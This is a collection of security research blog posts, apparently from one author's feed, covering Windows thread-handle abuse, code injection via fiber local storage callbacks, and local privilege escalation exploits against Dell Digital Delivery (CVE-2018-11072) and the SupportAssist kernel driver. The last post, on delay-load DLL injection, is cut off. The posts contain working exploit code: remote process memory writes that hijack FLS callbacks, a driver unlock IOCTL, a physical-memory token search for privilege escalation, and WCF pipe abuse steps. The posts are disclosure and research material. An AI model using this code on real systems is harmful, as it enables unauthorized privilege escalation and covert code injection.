1 2	`hNewThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpRtl, 0, CREATE_SUSPENDED, &dwTid); NtImpersonateThread(hNewThread, hThread, &sqos);`

The hNewThread will now be executing with a SYSTEM token, allowing us to do whatever we need under the privileged impersonation context.

THREAD_IMPERSONATE

Unfortunately I was unable to identify a surefire, generic method for exploiting this one. We have no ability to query the remote thread, nor can we gain any control over its execution flow. We’re simply allowed to manage its impersonation state.

We can use this to force the privileged thread to impersonate us, using the NtImpersonateThread call, which may unlock additional logic bugs in the application. For example, if the service were to create shared resources under a user context for which it would typically be SYSTEM, such as a file, we can gain ownership over that file. If multiple privileged threads access it for information (such as configuration) it could lead to code execution.

THREAD_SET_CONTEXT

While this right grants us access to SetThreadContext, it also conveniently allows us to use QueueUserAPC. This is effectively granting us a CreateRemoteThread primitive with caveat. For an APC to be processed by the thread, it needs to enter an alertable state. This happens when a specific set of win32 functions are executed, so it is entirely possible that the thread never becomes alertable.

If we’re working with an uncooperative thread, SetThreadContext comes in handy. Using it, we can force the thread to become alertable via the NtTestAlert function. Of course, we have no ability to call GetThreadContext and will therefore likely lose control of the thread after exploitation.

In combination with THREAD_GET_CONTEXT, this right would allow us to replicate the Ghostwriting code injection technique discussed in the THREAD_ALL_ACCESS section above.

THREAD_SET_INFORMATION

Needed to set various ThreadInformationClass[9] values on a thread, usually via NtSetInformationThread. After looking through all of these, I did not identify any immediate ways in which we could influence the remote thread. Some of the values are interesting but unusuable (ThreadSetTlsArrayAddress, ThreadAttachContainer, etc) and are either not implemented/removed or require SeDebugPrivilege or similar.

I’m not really sure what would make this a viable candidate either. There’s really not a lot of juicy stuff that can be done via the available functions

THREAD_SET_LIMITED_INFORMATION

This allows the caller to set a subset of THREAD_INFORMATION_CLASS values, namely: ThreadPriority, ThreadPriorityBoost, ThreadAffinityMask, ThreadSelectedCpuSets, and ThreadNameInformation. None of these get us anywhere near an exploitable primitive.

THREAD_SET_THREAD_TOKEN

Similar to THREAD_IMPERSONATE, I was unable to find a direct and generic method of abusing this right. I can set the thread’s token or modify a few fields (via SetTokenInformation), but this doesn’t grant us much.

Conclusion

I was a little disappointed in how uneventful thread rights seemed to be. Almost half of them proved to be unexploitable on their own, and even in combination did not turn much up. As per above, having one of the following three privileges is necessary to turn a leaked thread handle into something exploitable:

1
2
3

THREAD_ALL_ACCESS
THREAD_DIRECT_IMPERSONATION
THREAD_SET_CONTEXT

Missing these will require a deeper understanding of your target and some creativity.

Similarly, processes have a specific subset of rights that are directly exploitable:

PROCESS_ALL_ACCESS
PROCESS_CREATE_PROCESS
PROCESS_CREATE_THREAD
PROCESS_DUP_HANDLE
PROCESS_VM_WRITE

Barring these, more creativity is required.

References

[0]https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html
[1]https://googleprojectzero.blogspot.com/2018/05/bypassing-mitigations-by-attacking-jit.html
[2]https://d4stiny.github.io/Local-Privilege-Escalation-on-most-Dell-computers/
[3]https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights
[4]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext
[5]https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext
[6]http://blog.txipinet.com/2007/04/05/69-a-paradox-writing-to-another-process-without-openning-it-nor-actually-writing-to-it/
[7]https://tyranidslair.blogspot.com/2017/08/the-art-of-becoming-trustedinstaller.html
[8]https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FThread%2FNtImpersonateThread.html
[9]https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/blob/master/NtApiDotNet/NtThreadNative.cs#L51
[10]https://github.com/SafeBreach-Labs/pinjectra
[11]https://gist.github.com/hatRiot/aa77f007601be75684b95fe7ba978079
[12]http://www.hexacorn.com/blog/category/code-injection/
[13]http://hatriot.github.io/blog/2019/08/12/code-execution-via-fiber-local-storage
[14]http://www.nynaeve.net/?p=180
[15]https://github.com/processhacker/processhacker/blob/master/phnt/include/ntpsapi.h#L98

http://dronesec.pw/
Code Execution via Fiber Local StorageBryan Alexander
12 August 2019 at 21:10

Code Execution via Fiber Local Storage

http://dronesec.pw/

By: Bryan Alexander

12 August 2019 at 21:10

While working on another research project (post to be released soon, will update here), I stumbled onto a very Hexacorn[0] inspired type of code injection technique that fit my situation perfectly. Instead of tainting the other post with its description and code, I figured I’d release a separate post describing it here.

When I say that it’s Hexacorn inspired, I mean that the bulk of the strategy is similar to everything else you’ve probably seen; we open a handle to the remote process, allocate some memory, and copy our shellcode into it. At this point we simply need to gain control over execution flow; this is where most of Hexacorn’s techniques come in handy. PROPagate via window properties, WordWarping via rich edit controls, DnsQuery via code pointers, etc. Another great example is Windows Notification Facility via user subscription callbacks (at least in modexp’s proof of concept), though this one isn’t Hexacorns.

These strategies are also predicated on the process having certain capabilities (DDE, private clipboards, WNF subscriptions), but more importantly, most, if not all, do not work across sessions or integrity levels. This is obvious and expected and frankly quite niche, but in my situation, a requirement.

Fibers

Fibers are “a unit of execution that must be manually scheduled by the application”[1]. They are essentially register and stack states that can be swapped in and out at will, and reflect upon the thread in which they are executing. A single thread can be running at most a single fiber at a time, but fibers can be hot swapped during execution and their quantum user controlled.

Fibers can also create and use fiber data. A pointer to this is stored in TEB->NtTib.FiberData and is a per-thread structure. This is initially set during a call to ConvertThreadToFiber. Taking a quick look at this:

void TestFiber()
{
    PVOID lpFiberData = HeapAlloc(GetProcessHeap(), 0, 0x10);
    PVOID lpFirstFiber = NULL;
    memset(lpFiberData, 0x41, 0x10);

    lpFirstFiber = ConvertThreadToFiber(lpFiberData);
    DebugBreak();
}

int main()
{
    DWORD tid = 0;
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestFiber, 0, 0, &tid);
    WaitForSingleObject(hThread, INFINITE);
    return 0;
}

We need to spawn off the test in a new thread, as the main thread will always have a fiber instantiated and the call will fail. If we run this in a debugger we can inspect the data after the break:

0:000> ~
.  0  Id: 1674.1160 Suspend: 1 Teb: 7ffde000 Unfrozen
#  1  Id: 1674.c78 Suspend: 1 Teb: 7ffdd000 Unfrozen
0:000> dt _NT_TIB 7ffdd000 FiberData
ucrtbased!_NT_TIB
   +0x010 FiberData : 0x002ea9c0 Void
0:000> dd poi(0x002ea9c0) l5
002ea998  41414141 41414141 41414141 41414141
002ea9a8  abababab

In addition to fiber data, fibers also have access to the fiber local storage (FLS). For all intents and purposes, this is identical to thread local storage (TLS)[2]. This allows all thread fibers access to shared data via a global index. The API for this is pretty simple, and very similar to TLS. In the following sample, we’ll allocate an index and toss some values in it. Using our previous example as base:

lpFirstFiber = ConvertThreadToFiber(lpFiberData);
dwIdx = FlsAlloc(NULL);
FlsSetValue(dwIdx, lpFiberData);
DebugBreak();

A pointer to this data is stored in the thread’s TEB, and can be extracted from TEB->FlsData. From the above example, assume the returned FLS index for this data is 6:

0:001> ~
   0  Id: 15f0.a10 Suspend: 1 Teb: 7ffdf000 Unfrozen
.  1  Id: 15f0.c30 Suspend: 1 Teb: 7ffde000 Unfrozen
0:001> dt _TEB 7ffde000 FlsData
ntdll!_TEB
   +0xfb4 FlsData : 0x0049a008 Void
0:001> dd poi(0x0049a008+(4*8))
0049a998  41414141 41414141 41414141 41414141
0049a9a8  abababab

Note that the offset is always the index + 2.

Abusing FLS Callbacks to Obtain Execution Control

Let’s return to that FlsAlloc call from the above example. Its first parameter is a PFLS_CALLBACK_FUNCTION[3] and is used for, according to MSDN:

An application-defined function. If the FLS slot is in use, FlsCallback is
called on fiber deletion, thread exit, and when an FLS index is freed. Specify
this function when calling the FlsAlloc function. The PFLS_CALLBACK_FUNCTION
type defines a pointer to this callback function.

Well isn’t that lovely. These callbacks are stored process wide in PEB->FlsCallback. Let’s try it out:

1	`dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);`

And fetching it (assuming again an index of 6):

0:001> dt _PEB 7ffd8000 FlsCallback
ucrtbased!_PEB
   +0x20c FlsCallback : 0x002d51f8 _FLS_CALLBACK_INFO
0:001> dd 0x002d51f8 + (2 * 6 * 4) l1
002d5228  41414141

What happens when we let this run to process exit?

0:001> g
(10a8.1328): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd8000 ecx=002da998 edx=002d522c esi=00000006 edi=002da028
eip=41414141 esp=0051f71c ebp=0051f734 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???

Recall the MSDN comment about when the FLS callback is invoked: ..on fiber deletion, thread exit, and when an FLS index is freed. This means that worst case our code executes once the process exits and best case following a threads exit or call to FlsFree. It’s worth reiterating that the primary thread for each process will have a fiber instantiated already; it’s quite possible that this thread isn’t around anymore, but this doesn’t matter as the callbacks are at the process level.

Another salient point here is the first parameter to the callback function. This parameter is the value of whatever was in the indexed slot and is also stashed in ECX/RCX before invoking the callback:

1
2
3

dwIdx = FlsAlloc((PFLS_CALLBACK_FUNCTION)0x41414141);
FlsSetValue(dwIdx, (PVOID)0x42424242);
DebugBreak();

Which, when executed:

(aa8.169c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=7ffd9000 ecx=42424242 edx=003c522c esi=00000006 edi=003ca028
eip=41414141 esp=006ef9c0 ebp=006ef9d8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
41414141 ??              ???

Under specific circumstances, this can be quite useful.

Anyway, PoC||GTFO, I’ve included some code below. In it, we overwrite the msvcrt!_freefls call used to free the FLS buffer.

#ifdef _WIN64
#define FlsCallbackOffset 0x320
#else
#define FlsCallbackOffset 0x20c
#endif

void OverwriteFlsCallback(LPVOID dwNewAddr, HANDLE hProcess) 
{
    _NtQueryInformationProcess NtQueryInformationProcess = (_NtQueryInformationProcess)GetProcAddress(GetModuleHandleA("ntdll"), 
                                                            "NtQueryInformationProcess");
    const char *payload = "\xcc\xcc\xcc\xcc";
    PROCESS_BASIC_INFORMATION pbi;
    SIZE_T sCallback = 0, sRetLen = 0;
    LPVOID lpBuf = NULL;

    //
    // allocate memory and write in our payload as one would normally do
    //

    lpBuf = VirtualAllocEx(hProcess, NULL, sizeof(SIZE_T), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess, lpBuf, payload, sizeof(SIZE_T), NULL);

    // now we need to fetch the remote process PEB
    NtQueryInformationProcess(hProcess, PROCESSINFOCLASS(0), &pbi,
                              sizeof(PROCESS_BASIC_INFORMATION), NULL);

    // read the FlsCallback address out of it
    ReadProcessMemory(hProcess, (LPVOID)(((SIZE_T)pbi.PebBaseAddress) + FlsCallbackOffset), 
                          (LPVOID)&sCallback, sizeof(SIZE_T), &sRetLen);
    sCallback += 2 * sizeof(SIZE_T);

    // we're targeting the _freefls call, so overwrite that with our payload
    // address 
    WriteProcessMemory(hProcess, (LPVOID)sCallback, &dwNewAddr, sizeof(SIZE_T), &sRetLen);
}

I tested this on an updated Windows 10 x64 against notepad and mspaint; on process exit, the callback is executed and we gain control over execution flow. Pretty useful in the end; more on this soon…

References

[0] http://www.hexacorn.com
[1] https://docs.microsoft.com/en-us/windows/win32/procthread/fibers
[2] https://docs.microsoft.com/en-us/windows/win32/procthread/thread-local-storage
[3] https://docs.microsoft.com/en-us/windows/win32/api/winnt/nc-winnt-pfls_callback_function

http://dronesec.pw/
Dell Digital Delivery - CVE-2018-11072 - Local Privilege EscalationBryan Alexander
22 August 2018 at 21:10

Dell Digital Delivery - CVE-2018-11072 - Local Privilege Escalation

http://dronesec.pw/

By: Bryan Alexander

22 August 2018 at 21:10

Back in March or April I began reversing a slew of Dell applications installed on a laptop I had. Many of them had privileged services or processes running and seemed to perform a lot of different complex actions. I previously disclosed a LPE in SupportAssist[0], and identified another in their Digital Delivery platform. This post will detail a Digital Delivery vulnerability and how it can be exploited. This was privately discovered and disclosed, and no known active exploits are in the wild. Dell has issued a security advisory for this issue, which can be found here[4].

I’ll have another follow-up post detailing the internals of this application and a few others to provide any future researchers with a starting point. Both applications are rather complex and expose a large attack surface. If you’re interested in bug hunting LPEs in large C#/C++ applications, it’s a fine place to begin.

Dell’s Digital Delivery[1] is a platform for buying and installing system software. It allows users to purchase or manage software packages and reinstall them as necessary. Once again, it comes “..preinstalled on most Dell systems.”[1]

Bug

The Digital Delivery service runs as SYSTEM under the name DeliveryService, which runs the DeliveryService.exe binary. A userland binary, DeliveryTray.exe, is the user-facing component that allows users to view installed applications or reinstall previously purchased ones.

Communication from DeliveryTray to DeliveryService is performed via a Windows Communication Foundation (WCF) named pipe. If you’re unfamiliar with WCF, it’s essentially a standard methodology for exchanging data between two endpoints[2]. It allows a service to register a processing endpoint and expose functionality, similar to a web server with a REST API.

For those following along at home, you can find the initialization of the WCF pipe in Dell.ClientFulfillmentService.Controller.Initialize:

1
2
3

this._host = WcfServiceUtil.StandupServiceHost(typeof(UiWcfSession),
                                typeof(IClientFulfillmentPipeService),
                                "DDDService");

This invokes Dell.NamedPipe.StandupServiceHost:

ServiceHost host = null;
string apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService";
Uri realUri = new Uri("net.pipe://localhost/" + Guid.NewGuid().ToString());
Tryblock.Run(delegate
{
  host = new ServiceHost(classType, new Uri[]
  {
    realUri
  });
  host.AddServiceEndpoint(interfaceType, WcfServiceUtil.CreateDefaultBinding(), string.Empty);
  host.Open();
}, null, null);
AuthenticationManager.Singleton.RegisterEndpoint(apiUrl, realUri.AbsoluteUri);

The endpoint is thus registered and listening and the AuthenticationManager singleton is responsible for handling requests. Once a request comes in, the AuthenticationManager passes this off to the AuthPipeWorker function which, among other things, performs the following authentication:

string execuableByProcessId = AuthenticationManager.GetExecuableByProcessId(processId);
bool flag2 = !FileUtils.IsSignedByDell(execuableByProcessId);
if (!flag2)
{
    ...

If the process on the other end of the request is backed by a signed Dell binary, the request is allowed and a connection may be established. If not, the request is denied.

I noticed that this is new behavior, added sometime between 3.1 (my original testing) and 3.5 (latest version at the time, 3.5.1001.0), so I assume Dell is aware of this as a potential attack vector. Unfortunately, this is an inadequate mitigation to sufficiently protect the endpoint. I was able to get around this by simply spawning an executable signed by Dell (DeliveryTray.exe, for example) and injecting code into it. Once code is injected, the WCF API exposed by the privileged service is accessible.

The endpoint service itself is implemented by Dell.NamedPipe, and exposes a dozen or so different functions. Those include:

ArchiveAndResetSettings
EnableEntitlements
EnableEntitlementsAsync
GetAppSetting
PingTrayApp
PollEntitlementService
RebootMachine
ReInstallEntitlement
ResumeAllOperations
SetAppSetting
SetAppState
SetEntitlementList
SetUserDownloadChoice
SetWallpaper
ShowBalloonTip
ShutDownApp
UpdateEntitlementUiState

Digital Delivery calls application install packages “entitlements”, so the references to installation/reinstallation are specific to those packages either available or presently installed.

One of the first functions I investigated was ReInstallEntitlement, which allows one to initiate a reinstallation process of an installed entitlement. This code performs the following:

private static void ReInstallEntitlementThreadStart(object reInstallArgs)
{
    PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs)reInstallArgs;
    PipeServiceClient.TryWcfCall(delegate
    {
        PipeServiceClient._commChannel.ReInstall(ra.EntitlementId, ra.RunAsUser);
    }, string.Concat(new object[]
    {
        "ReInstall ",
        ra.EntitlementId,
        " ",
        ra.RunAsUser.ToString()
    }));
}

This builds the arguments from the request and invokes a WCF call, which is sent to the WCF endpoint. The ReInstallEntitlement call takes two arguments: an entitlement ID and a RunAsUser flag. These are both controlled by the caller.

On the server side, Dell.ClientFulfillmentService.Controller handles implementation of these functions, and OnReInstall handles the entitlement reinstallation process. It does a couple sanity checks, validates the package signature, and hits the InstallationManager to queue the install request. The InstallationManager has a job queue and background thread (WorkingThread) that occasionally polls for new jobs and, when it receives the install job, kicks off InstallSoftware.

Because we’re reinstalling an entitlement, the package is cached to disk and ready to be installed. I’m going to gloss over a few installation steps here because it’s frankly standard and menial.

The installation packages are located in C:\ProgramData\Dell\DigitalDelivery\Downloads\Software\ and are first unzipped, followed by an installation of the software. In my case, I was triggering the installation of Dell Data Protection - Security Tools v1.9.1, and if you follow along in procmon, you’ll see it startup an install process:

1
2
3

"C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _
Security Tools v1.9.1\STSetup.exe" -y -gm2 /S /z"\"CIRRUS_INSTALL,
SUPPRESSREBOOT=1\""

The run user for this process is determined by the controllable RunAsUser flag and, if set to False, runs as SYSTEM out of the %ProgramData% directory.

During process launch of the STSetup process, I noticed the following in procmon:

C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\VERSION.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\UxTheme.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\PROPSYS.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\apphelp.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\Secur32.dll
C:\ProgramData\Dell\Digital Delivery\Downloads\Software\Dell Data Protection _ Security Tools v1.9.1\api-ms-win-downlevel-advapi32-l2-1-0.dll

Of interest here is that the parent directory, %ProgramData%\Dell\Digital Delivery\Downloads\Software is not writable by any system user, but the entitlement package folders, Dell Data Protection - Security Tools in this case, is.

This allows non-privileged users to drop arbitrary files into this directory, granting us a DLL hijacking opportunity.

Exploitation

Exploiting this requires several steps:

Drop a DLL under the appropriate %ProgramData% software package directory
Launch a new process running an executable signed by Dell
Inject C# into this process (which is running unprivileged in userland)
Connect to the WCF named pipe from within the injected process
Trigger ReInstallEntitlement

Steps 4 and 5 can be performed using the following:

PipeServiceClient client = new PipeServiceClient();
client.Initialize();

while (PipeServiceClient.AppState == AppState.Initializing)
  System.Threading.Thread.Sleep(1000);

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList[0];
PipeServiceClient.ReInstallEntitlement(entitle.ID, false);
System.Threading.Thread.Sleep(30000);

PipeServiceClient.CloseConnection();

The classes used above are imported from NamedPipe.dll. Note that we’re simply choosing the first entitlement available and reinstalling it. You may need to iterate over entitlements to identify the correct package pointing to where you dropped your DLL.

I’ve provided a PoC on my Github here[3], and Dell has additionally released a security advisory, which can be found here[4].

Timeline

05/24/18 – Vulnerability initially reported
05/30/18 – Dell requests further information
06/26/18 – Dell provides update on review and remediation
07/06/18 – Dell provides internal tracking ID and update on progress
07/24/18 – Update request
07/30/18 – Dell confirms they will issue a security advisory and associated CVE
08/07/18 – 90 day disclosure reminder provided
08/10/18 – Dell confirms 8/22 disclosure date alignment
08/22/18 – Public disclosure

References

[0] http://hatriot.github.io/blog/2018/05/17/dell-supportassist-local-privilege-escalation/
[1] https://www.dell.com/learn/us/en/04/flatcontentg/dell-digital-delivery
[2] https://docs.microsoft.com/en-us/dotnet/framework/wcf/whats-wcf
[3] https://github.com/hatRiot/bugs
[4] https://www.dell.com/support/article/us/en/04/SLN313559

http://dronesec.pw/
Dell SupportAssist Driver - Local Privilege EscalationBryan Alexander
18 May 2018 at 04:00

Dell SupportAssist Driver - Local Privilege Escalation

http://dronesec.pw/

By: Bryan Alexander

18 May 2018 at 04:00

This post details a local privilege escalation (LPE) vulnerability I found in Dell’s SupportAssist[0] tool. The bug is in a kernel driver loaded by the tool, and is pretty similar to bugs found by ReWolf in ntiolib.sys/winio.sys[1], and those found by others in ASMMAP/ASMMAP64[2]. These bugs are pretty interesting because they can be used to bypass driver signature enforcement (DSE) ad infinitum, or at least until they’re no longer compatible with newer operating systems.

Dell’s SupportAssist is, according to the site, “(..) now preinstalled on most of all new Dell devices running Windows operating system (..)”. It’s primary purpose is to troubleshoot issues and provide support capabilities both to the user and to Dell. There’s quite a lot of functionality in this software itself, which I spent quite a bit of time reversing and may blog about at a later date.

Bug

Calling this a “bug” is really a misnomer; the driver exposes this functionality eagerly. It actually exposes a lot of functionality, much like some of the previously mentioned drivers. It provides capabilities for reading and writing the model-specific register (MSR), resetting the 1394 bus, and reading/writing CMOS.

The driver is first loaded when the SupportAssist tool is launched, and the filename is pcdsrvc_x64.pkms on x64 and pcdsrvc.pkms on x86. Incidentally, this driver isn’t actually even built by Dell, but rather another company, PC-Doctor[3]. This company provides “system health solutions” to a variety of companies, including Dell, Intel, Yokogawa, IBM, and others. Therefore, it’s highly likely that this driver can be found in a variety of other products…

Once the driver is loaded, it exposes a symlink to the device at PCDSRVC{3B54B31B-D06B6431-06020200}_0 which is writable by unprivileged users on the system. This allows us to trigger one of the many IOCTLs exposed by the driver; approximately 30. I found a DLL used by the userland agent that served as an interface to the kernel driver and conveniently had symbol names available, allowing me to extract the following:

// 0x222004 = driver activation ioctl
// 0x222314 = IoDriver::writePortData
// 0x22230c = IoDriver::writePortData
// 0x222304 = IoDriver::writePortData
// 0x222300 = IoDriver::readPortData
// 0x222308 = IoDriver::readPortData
// 0x222310 = IoDriver::readPortData
// 0x222700 = EcDriver::readData
// 0x222704 = EcDriver::writeData
// 0x222080 = MemDriver::getPhysicalAddress
// 0x222084 = MemDriver::readPhysicalMemory
// 0x222088 = MemDriver::writePhysicalMemory
// 0x222180 = Msr::readMsr
// 0x222184 = Msr::writeMsr
// 0x222104 = PciDriver::readConfigSpace
// 0x222108 = PciDriver::writeConfigSpace
// 0x222110 = PciDriver::?
// 0x22210c = PciDriver::?
// 0x222380 = Port1394::doesControllerExist
// 0x222384 = Port1394::getControllerConfigRom
// 0x22238c = Port1394::getGenerationCount
// 0x222388 = Port1394::forceBusReset
// 0x222680 = SmbusDriver::genericRead
// 0x222318 = SystemDriver::readCmos8
// 0x22231c = SystemDriver::writeCmos8
// 0x222600 = SystemDriver::getDevicePdo
// 0x222604 = SystemDriver::getIntelFreqClockCounts
// 0x222608 = SystemDriver::getAcpiThermalZoneInfo

Immediately the MemDriver class jumps out. After some reversing, it appeared that these functions do exactly as expected: allow userland services to both read and write arbitrary physical addresses. There are a few quirks, however.

To start, the driver must first be “unlocked” in order for it to begin processing control codes. It’s unclear to me if this is some sort of hacky event trigger or whether the kernel developers truly believed this would inhibit malicious access. Either way, it’s goofy. To unlock the driver, a simple ioctl with the proper code must be sent. Once received, the driver will process control codes for the lifetime of the system.

To unlock the driver, we just execute the following:

BOOL bResult;
DWORD dwRet;
SIZE_T code = 0xA1B2C3D4, outBuf;

bResult = DeviceIoControl(hDriver, 0x222004, 
                          &code, sizeof(SIZE_T), 
                          &outBuf, sizeof(SIZE_T), 
                          &dwRet, NULL);

Once the driver receives this control code and validates the received code (0xA1B2C3D4), it sets a global flag and begins accepting all other control codes.

Exploitation

From here, we could exploit this the same way rewolf did [4]: read out physical memory looking for process pool tags, then traverse these until we identify our process as well as a SYSTEM process, then steal the token. However, PCD appears to give us a shortcut via getPhysicalAddress ioctl. If this does indeed return the physical address of a given virtual address (VA), we can simply find the physical of our VA and enable a couple token privileges[5] using the writePhysicalMemory ioctl.

Here’s how the getPhysicalAddress function works:

v5 = IoAllocateMdl(**(PVOID **)(a1 + 0x18), 1u, 0, 0, 0i64);
v6 = v5;
if ( !v5 )
  return 0xC0000001i64;
MmProbeAndLockPages(v5, 1, 0);
**(_QWORD **)(v3 + 0x18) = v4 & 0xFFF | ((_QWORD)v6[1].Next << 0xC);
MmUnlockPages(v6);
IoFreeMdl(v6);

Keen observers will spot the problem here; the MmProbeAndLockPages call is passing in UserMode for the KPROCESSOR_MODE, meaning we won’t be able to resolve any kernel mode VAs, only usermode addresses.

We can still read chunks of physical memory unabated, however, as the readPhysicalMemory function is quite simple:

if ( !DoWrite )
{
  memmove(a1, a2, a3);
  return 1;
}

They reuse a single function for reading and writing physical memory; we’ll return to that. I decided to take a different approach than rewolf for a number of reasons with great results.

Instead, I wanted to toggle on SeDebugPrivilege for my current process token. This would require finding the token in memory and writing a few bytes at a field offset. To do this, I used readPhysicalMemory to read chunks of memory of size 0x10000000 and checked for the first field in a _TOKEN, TokenSource. In a user token, this will be the string User32. Once we’ve identified this, we double check that we’ve found a token by validating the TokenLuid, which we can obtain from userland using the GetTokenInformation API.

In order to speed up the memory search, I only iterate over the addresses that match the token’s virtual address byte index. Essentially, when you convert a virtual address to a physical address (PA) the byte index, or the lower 12 bits, do not change. To demonstrate, assume we have a VA of 0xfffff8a001cc2060. Translating this to a physical address then:

kd> !pte  fffff8a001cc2060
                                           VA fffff8a001cc2060
PXE at FFFFF6FB7DBEDF88    PPE at FFFFF6FB7DBF1400    PDE at FFFFF6FB7E280070    PTE at FFFFF6FC5000E610
contains 000000007AC84863  contains 00000000030D4863  contains 0000000073147863  contains E6500000716FD963
pfn 7ac84     ---DA--KWEV  pfn 30d4      ---DA--KWEV  pfn 73147     ---DA--KWEV  pfn 716fd     -G-DA--KW-V

kd> ? 716fd * 0x1000 + 060
Evaluate expression: 1903153248 = 00000000`716fd060

So our physical address is 0x716fd060 (if you’d like to read more about converting VA to PA, check out this great Microsoft article[6]). Notice the lower 12 bits remain the same between VA/PA. The search loop then boiled down to the following code:

uStartAddr = uStartAddr + (VirtualAddress & 0xfff);
for (USHORT chunk = 0; chunk < 0xb; ++chunk) {
    lpMemBuf = ReadBlockMem(hDriver, uStartAddr, 0x10000000);
    for(SIZE_T i = 0; i < 0x10000000; i += 0x1000, uStartAddr += 0x1000){
        if (memcmp((DWORD)lpMemBuf + i, "User32 ", 8) == 0){
            
            if (TokenId <= 0x0)
                FetchTokenId();

            if (*(DWORD*)((char*)lpMemBuf + i + 0x10) == TokenId) {
                hTokenAddr = uStartAddr;
                break;
            }
        }
    }

    HeapFree(GetProcessHeap(), 0, lpMemBuf);

    if (hTokenAddr > 0x0)
        break;
}

Once we identify the PA of our token, we trigger two separate writes at offset 0x40 and offset 0x48, or the Enabled and Default fields of a _TOKEN. This sometimes requires a few runs to get right (due to mapping, which I was too lazy to work out), but is very stable.

You can find the source code for the bug here.

Timeline

04/05/18 – Vulnerability reported
04/06/18 – Initial response from Dell
04/10/18 – Status update from Dell
04/18/18 – Status update from Dell
05/16/18 – Patched version released (v2.2)

References

[0] http://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist [1] http://blog.rewolf.pl/blog/?p=1630 [2] https://www.exploit-db.com/exploits/39785/ [3] http://www.pc-doctor.com/ [4] https://github.com/rwfpl/rewolf-msi-exploit [5] https://github.com/hatRiot/token-priv [6] https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/converting-virtual-addresses-to-physical-addresses\

http://dronesec.pw/
Abusing delay load DLLs for remote code injectionBryan Alexander
19 September 2017 at 21:00

Abusing delay load DLLs for remote code injection

http://dronesec.pw/

By: Bryan Alexander

19 September 2017 at 21:00

I always tell myself that I’ll try posting more frequently on my blog, and yet here I am, two years later. Perhaps this post will provide the necessary motiviation to conduct more public research. I do love it.

This post details a novel remote code injection technique I discovered while playing around with delay loading DLLs. It allows for the injection of arbitrary code into arbitrary remote, running processes, provided that they implement the abused functionality. To make it abundantly clear, this is not an exploit, it’s simply another strategy for migrating into other processes.

Modern code injection techniques typically rely on a variation of two different win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a great article[0] detailing ten various methods of process injection. While not all of them allow for injection into remote processes, particularly those already running, it does detail the most common, public variations. This strategy is more akin to inline hooking, though we’re not touching the IAT and we don’t require our code to already be in the process. There are no calls to NtQueueApc or CreateRemoteThread, and no need for thread or process suspension. There are some limitations, as with anything, which I’ll detail below.

Delay Load DLL

Delay loading is a linker strategy that allows for the lazy loading of DLLs. Executables commonly load all necessary dynamically linked libraries at runtime and perform the IAT fix-ups then. Delay loading, however, allows for these libraries to be lazy loaded at call time, supported by a pseudo IAT that’s fixed-up on first call. This process can be better illuminated by the following, decades old figure below:

This image comes from a great Microsoft article released in 1998 [1] that describes the strategy quite well, but I’ll attempt to distill it here.

Portable executables contain a data directory named IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports or using windbg. The structure of this entry is described in delayhlp.cpp, included with the WinSDK:

struct InternalImgDelayDescr {
    DWORD           grAttrs;        // attributes
    LPCSTR          szName;         // pointer to dll name
    HMODULE *       phmod;          // address of module handle
    PImgThunkData   pIAT;           // address of the IAT
    PCImgThunkData  pINT;           // address of the INT
    PCImgThunkData  pBoundIAT;      // address of the optional bound IAT
    PCImgThunkData  pUnloadIAT;     // address of optional copy of original IAT
    DWORD           dwTimeStamp;    // 0 if not bound,
                                    // O.W. date/time stamp of DLL bound to (Old BIND)
    };

The table itself contains RVAs, not pointers. We can find the delay directory offset by parsing the file header:

0:022> lm m explorer
start    end        module name
00690000 00969000   explorer   (pdb symbols)          
0:022> !dh 00690000 -f

File Type: EXECUTABLE IMAGE
FILE HEADER VALUES

[...] 

   68A80 [      40] address [size] of Load Configuration Directory
       0 [       0] address [size] of Bound Import Directory
    1000 [     D98] address [size] of Import Address Table Directory
   AC670 [     140] address [size] of Delay Import Directory
       0 [       0] address [size] of COR20 Header Directory
       0 [       0] address [size] of Reserved Directory

The first entry and it’s delay linked DLL can be seen in the following:

0:022> dd 00690000+ac670 l8
0073c670  00000001 000ac7b0 000b24d8 000b1000
0073c680  000ac8cc 00000000 00000000 00000000
0:022> da 00690000+000ac7b0 
0073c7b0  "WINMM.dll"

This means that WINMM is dynamically linked to explorer.exe, but delay loaded, and will not be loaded into the process until the imported function is invoked. Once loaded, a helper function fixes up the psuedo IAT by using GetProcAddress to locate the desired function and patching the table at runtime.
